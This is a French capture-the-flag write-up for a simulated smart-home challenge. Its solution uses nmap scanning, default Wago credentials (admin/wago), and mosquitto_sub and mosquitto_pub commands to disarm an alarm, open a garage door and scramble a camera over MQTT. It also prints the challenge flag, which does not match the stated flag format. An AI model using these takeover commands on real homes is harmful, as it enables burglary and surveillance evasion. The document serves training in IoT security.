# WRITEUP IOT / STUPID HOUSE
## Consignes
```
Votre voisin Homer vous a emprunté depuis plus d’un mois votre grille-pain et vous voulez le récupérer.

Vous pourrez pénétrer chez lui et récupérer votre bien précieux, si et seulement si :

- Toutes lumières sont éteintes;

- La porte du garage est ouverte;

- L’alarme est désactivée;

- L’image de la caméra est brouillée;

- La VMC est à vitesse maximale (asservie à l'humidité de la maison).


Par chance, vous avez réussi à obtenir le mot de passe Wifi de sa box et à vous connecter à son réseau local (192.168.119.0/24), il n’y a plus qu’à prendre le contrôle de sa maison.

Le flag sera envoyé une fois toutes les conditions réunies

**Consignes de jeu : **

**- l'interface de gestion ainsi que le routeur WiFi sont hors jeu. **

**- Déconnectez vous une fois le flag obtenu, ne perturbez pas les autres joueurs.**

> Format du flag : fl@g{.....................}
```

## Pièces jointes :  

![maison tableau de bord](assets/maison tableau de bord2.png)

## Serveur :  

Un serveur PC de type bureautique. Les services et IOT virtuels démarrent au sein d'un fichier *compose* Docker:
```bash
docker-compose up
```

## Points attribués :  

```
50 Points. (Déroutant mais pas difficile.)
```

## Hint:

Néant.

## Flag :  
```
JIIIOU8_FLAG_LxQSDPOPOQS
```
### Explications
#### Description

Le principe du jeu est d'attaquer le protocole de communication entre les objets connectés.

**L'interface de gestion homme/machine ainsi que les IOT eux même ne sont pas visés**.

Nous partons de l'hypothèse que l'attaquant a déjà accès au réseau Ethernet de la maison via un un vol de clé Wifi par exemple. Néanmoins, il n’a aucune connaissance des équipements présents.

#### Architecture :  

Architecture non virtualisé sur un réseau physique 192.168.119.0/24. Elle est composée de:

- un serveur domotique hébergeant le service de gestion *HomeAssistant*, le bus logiciel et les IOT simulés;
- cinq IOT physiques ESP8266 ou ESP32 (RISC, Tensilica Xtensa) équipés d'un firmware "maison" connectés au serveur via le Wifi.

L'ensemble des commandes et comptes rendus des capteurs/actionneurs sont échangés via un broker MQTT.

![](assets/architecture_réseaux.png)

#### Solution

Les joueurs devront donc :

- Scanner le réseau (nmap)
    ```bash
    nmap -p1-2000 -sVC 192.168.119.0/24
    ```

    > **Attention**: Le port MQTT ne fait pas partie des 1000 ports par défaut de NMAP.

    - Découvrir le serveur MQTT protégé par une authentification en clair (user/passwd)

    - Découvrir un serveur Web d’administration d’un équipement électrique Wago (bidon, simulé)

- Se connecter à la page Web de maintenance via les  comptes/mots de passe par défaut trouvés sur la documentation publique du constructeur (admin/wago)

- Lire sur cette page la configuration du serveur MQTT (@IP, login, mot de passe)

- Se mettre en écoute du serveur de messagerie via le topic « # »

  ```
  mosquitto_sub -h mqtt -u toto -P "TotoMDM*613" -t "#" -v
  ```

- En déduire le nom des topics des équipements et le protocole utilisé (simple, exemple ON/OFF, **documenté sur le site web de home assistant**)

- Prendre le contrôle de la maison et suivre la procédure demandée dans l’énoncé du jeu:

```
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t maison/chambre/lumiere/set -m OFF
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t maison/salon/lumiere/set -m OFF
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t maison/sdb/lumiere/set -m OFF
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t maison/garage/porte/set -m OPEN
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t maison/alarme/set -m DISARM
# Brouillage temporaire image caméra
sleep 3
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t maison/cuisine/camera -m qsdqsd
mosquitto_pub -h 192.168.119.1 -u toto -P "TotoMDM*613" -t station_meteo/humidity -m 100
```

Une fois le challenge réussi, une sonnerie retentie, les différents systèmes se réinitialisent et le flag est envoyé sur le topic "FLAG" (inconnu).

<!-- Review Taz : 20230321 -->